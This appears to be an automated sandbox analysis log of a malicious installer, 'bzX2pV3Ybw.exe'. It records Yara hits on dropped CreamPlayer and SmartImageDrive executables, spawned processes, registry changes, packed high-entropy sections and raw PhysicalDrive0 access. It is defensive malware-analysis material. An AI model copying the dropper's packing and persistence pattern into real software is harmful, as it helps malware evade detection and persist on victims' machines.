                    Source: Yara match | File source: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-JIRG1.tmp, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe, type: DROPPED
                    Source: Yara match | File source: C:\ProgramData\SmartImageDrive\SmartImageDrive.exe, type: DROPPED
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | File read: C:\Windows\win.ini
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                    Source: creamplayer_x32.exe, creamplayer_x32.exe, 00000005.00000003.1378130082.000000000096A000.00000004.00000020.00020000.00000000.sdmp, creamplayer_x32.exe, 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.5.dr, is-S3M63.tmp.2.dr | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: creamplayer_x32.exe, 00000005.00000003.1378130082.000000000096A000.00000004.00000020.00020000.00000000.sdmp, creamplayer_x32.exe, 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.5.dr, is-S3M63.tmp.2.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: creamplayer_x32.exe, creamplayer_x32.exe, 00000005.00000003.1378130082.000000000096A000.00000004.00000020.00020000.00000000.sdmp, creamplayer_x32.exe, 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.5.dr, is-S3M63.tmp.2.dr | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                    Source: creamplayer_x32.exe, 00000005.00000003.1378130082.000000000096A000.00000004.00000020.00020000.00000000.sdmp, creamplayer_x32.exe, 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.5.dr, is-S3M63.tmp.2.dr | Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                    Source: creamplayer_x32.exe, 00000005.00000003.1378130082.000000000096A000.00000004.00000020.00020000.00000000.sdmp, creamplayer_x32.exe, 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.5.dr, is-S3M63.tmp.2.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: creamplayer_x32.exe, 00000005.00000003.1378130082.000000000096A000.00000004.00000020.00020000.00000000.sdmp, creamplayer_x32.exe, 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.5.dr, is-S3M63.tmp.2.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: creamplayer_x32.exe, 00000005.00000003.1378130082.000000000096A000.00000004.00000020.00020000.00000000.sdmp, creamplayer_x32.exe, 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.5.dr, is-S3M63.tmp.2.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: creamplayer_x32.exe, 00000005.00000003.1378130082.000000000096A000.00000004.00000020.00020000.00000000.sdmp, creamplayer_x32.exe, 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.5.dr, is-S3M63.tmp.2.dr | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: creamplayer_x32.exe, 00000005.00000003.1378130082.000000000096A000.00000004.00000020.00020000.00000000.sdmp, creamplayer_x32.exe, 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.5.dr, is-S3M63.tmp.2.dr | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: creamplayer_x32.exe, 00000005.00000003.1378130082.000000000096A000.00000004.00000020.00020000.00000000.sdmp, creamplayer_x32.exe, 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.5.dr, is-S3M63.tmp.2.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: creamplayer_x32.exe, 00000005.00000003.1378130082.000000000096A000.00000004.00000020.00020000.00000000.sdmp, creamplayer_x32.exe, 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.5.dr, is-S3M63.tmp.2.dr | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: creamplayer_x32.exe, creamplayer_x32.exe, 00000005.00000003.1378130082.000000000096A000.00000004.00000020.00020000.00000000.sdmp, creamplayer_x32.exe, 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.5.dr, is-S3M63.tmp.2.dr | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: bzX2pV3Ybw.exe | ReversingLabs: Detection: 21%
                    Source: bzX2pV3Ybw.exe | String found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
                    Source: bzX2pV3Ybw.exe | String found in binary or memory: /LOADINF="filename"
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exe | File read: C:\Users\user\Desktop\bzX2pV3Ybw.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\bzX2pV3Ybw.exe "C:\Users\user\Desktop\bzX2pV3Ybw.exe"
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exe | Process created: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp "C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp" /SL5="$103F2,3847834,56832,C:\Users\user\Desktop\bzX2pV3Ybw.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" pause cream_player_12135
                    Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Process created: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe "C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe" -i
                    Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause cream_player_12135
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exe | Process created: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp "C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp" /SL5="$103F2,3847834,56832,C:\Users\user\Desktop\bzX2pV3Ybw.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" pause cream_player_12135
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Process created: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe "C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe" -i
                    Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause cream_player_12135
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\bzX2pV3Ybw.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: textinputframework.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: coreuicomponents.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: coremessaging.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: shfolder.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: msacm32.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: winmmbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: winmmbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: riched20.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: usp10.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: msls31.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: explorerframe.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: sfc.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Section loaded: sfc_os.dll
                    Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll
                    Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll
                    Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Section loaded: sqlite3.dll
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Section loaded: appxsip.dll
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Section loaded: opcservices.dll
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Section loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Section loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Section loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpWindow found: window name: TMainFormJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CreamPlayer_is1Jump to behavior
                    Source: bzX2pV3Ybw.exeStatic file information: File size 4096896 > 1048576
                    Source: Binary string: msvcp71.pdbx# source: is-7JNKK.tmp.2.dr
                    Source: Binary string: msvcr71.pdb< source: is-5889C.tmp.2.dr
                    Source: Binary string: msvcp71.pdb source: is-7JNKK.tmp.2.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-FFG28.tmp.2.dr
                    Source: Binary string: msvcr71.pdb source: is-5889C.tmp.2.dr

Data Obfuscation

Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Unpacked PE file: 5.2.creamplayer_x32.exe.400000.0.unpack .aett3:ER;.aftt3:R;.agtt3:W;.rsrc:R;.ahtt3:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Unpacked PE file: 5.2.creamplayer_x32.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_004502C0
Source: initial sample | Static PE information: section where entry point is pointing to: .aett3
Source: creamplayer_x32.exe.2.dr | Static PE information: section name: .aett3
Source: creamplayer_x32.exe.2.dr | Static PE information: section name: .aftt3
Source: creamplayer_x32.exe.2.dr | Static PE information: section name: .agtt3
Source: creamplayer_x32.exe.2.dr | Static PE information: section name: .ahtt3
Source: is-S3M63.tmp.2.dr | Static PE information: section name: /4
Source: is-S3M63.tmp.2.dr | Static PE information: section name: /19
Source: is-S3M63.tmp.2.dr | Static PE information: section name: /35
Source: is-S3M63.tmp.2.dr | Static PE information: section name: /51
Source: is-S3M63.tmp.2.dr | Static PE information: section name: /63
Source: is-S3M63.tmp.2.dr | Static PE information: section name: /77
Source: is-S3M63.tmp.2.dr | Static PE information: section name: /89
Source: is-S3M63.tmp.2.dr | Static PE information: section name: /102
Source: is-S3M63.tmp.2.dr | Static PE information: section name: /113
Source: is-S3M63.tmp.2.dr | Static PE information: section name: /124
Source: is-FFG28.tmp.2.dr | Static PE information: section name: Shared
Source: SmartImageDrive.exe.5.dr | Static PE information: section name: .aett3
Source: SmartImageDrive.exe.5.dr | Static PE information: section name: .aftt3
Source: SmartImageDrive.exe.5.dr | Static PE information: section name: .agtt3
Source: SmartImageDrive.exe.5.dr | Static PE information: section name: .ahtt3
Source: sqlite3.dll.5.dr | Static PE information: section name: /4
Source: sqlite3.dll.5.dr | Static PE information: section name: /19
Source: sqlite3.dll.5.dr | Static PE information: section name: /35
Source: sqlite3.dll.5.dr | Static PE information: section name: /51
Source: sqlite3.dll.5.dr | Static PE information: section name: /63
Source: sqlite3.dll.5.dr | Static PE information: section name: /77
Source: sqlite3.dll.5.dr | Static PE information: section name: /89
Source: sqlite3.dll.5.dr | Static PE information: section name: /102
Source: sqlite3.dll.5.dr | Static PE information: section name: /113
Source: sqlite3.dll.5.dr | Static PE information: section name: /124
Source: C:\Users\user\Desktop\bzX2pV3Ybw.exe | Code function: 0_2_004065C8 push 00406605h; ret 0_2_004065FD
Source: C:\Users\user\Desktop\bzX2pV3Ybw.exe | Code function: 0_2_004040B5 push eax; ret 0_2_004040F1
Source: C:\Users\user\Desktop\bzX2pV3Ybw.exe | Code function: 0_2_00408104 push ecx; mov dword ptr [esp], eax 0_2_00408109
Source: C:\Users\user\Desktop\bzX2pV3Ybw.exe | Code function: 0_2_00404185 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\bzX2pV3Ybw.exe | Code function: 0_2_00404206 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\bzX2pV3Ybw.exe | Code function: 0_2_0040C218 push eax; ret 0_2_0040C219
Source: C:\Users\user\Desktop\bzX2pV3Ybw.exe | Code function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\bzX2pV3Ybw.exe | Code function: 0_2_00404283 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\bzX2pV3Ybw.exe | Code function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_0040994C push 00409989h; ret 2_2_00409981
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00483F88 push 00484096h; ret 2_2_0048408E
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_004062B4 push ecx; mov dword ptr [esp], eax 2_2_004062B5
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_004104E0 push ecx; mov dword ptr [esp], edx 2_2_004104E5
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00412928 push 0041298Bh; ret 2_2_00412983
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00494CAC push ecx; mov dword ptr [esp], ecx 2_2_00494CB1
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_0040CE38 push ecx; mov dword ptr [esp], edx 2_2_0040CE3A
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_004592D0 push 00459314h; ret 2_2_0045930C
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_0040F398 push ecx; mov dword ptr [esp], edx 2_2_0040F39A
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00443440 push ecx; mov dword ptr [esp], ecx 2_2_00443444
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_0040546D push eax; ret 2_2_004054A9
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_0040553D push 00405749h; ret 2_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_004055BE push 00405749h; ret 2_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00485678 push ecx; mov dword ptr [esp], ecx 2_2_0048567D
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_0040563B push 00405749h; ret 2_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_004056A0 push 00405749h; ret 2_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_004517F8 push 0045182Bh; ret 2_2_00451823
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_004519BC push ecx; mov dword ptr [esp], eax 2_2_004519C1
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00477B08 push ecx; mov dword ptr [esp], edx 2_2_00477B09
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00419C28 push ecx; mov dword ptr [esp], ecx 2_2_00419C2D
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_0045FD1C push ecx; mov dword ptr [esp], ecx 2_2_0045FD20
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | Code function: 2_2_00499D30 pushad ; retf 2_2_00499D3F
Source: creamplayer_x32.exe.2.dr | Static PE information: section name: .aett3 entropy: 7.748755273599529
Source: SmartImageDrive.exe.5.dr | Static PE information: section name: .aett3 entropy: 7.748755273599529

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 5_2_02D4E898
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | File created: C:\Users\user\AppData\Local\CreamPlayer 1.12\msvcp71.dll (copy)
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | File created: C:\ProgramData\SmartImageDrive\sqlite3.dll
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | File created: C:\Users\user\AppData\Local\CreamPlayer 1.12\uninstall\is-9AR6U.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | File created: C:\Users\user\AppData\Local\CreamPlayer 1.12\sqlite3.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | File created: C:\Users\user\AppData\Local\CreamPlayer 1.12\gdiplus.dll (copy)
Source: C:\Users\user\Desktop\bzX2pV3Ybw.exe | File created: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | File created: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-FFG28.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | File created: C:\Users\user\AppData\Local\CreamPlayer 1.12\ltkrn13n.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | File created: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | File created: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | File created: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-U5LDH.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp | File created: C:\Users\user\AppData\Local\CreamPlayer 1.12\is-5889C.tmp
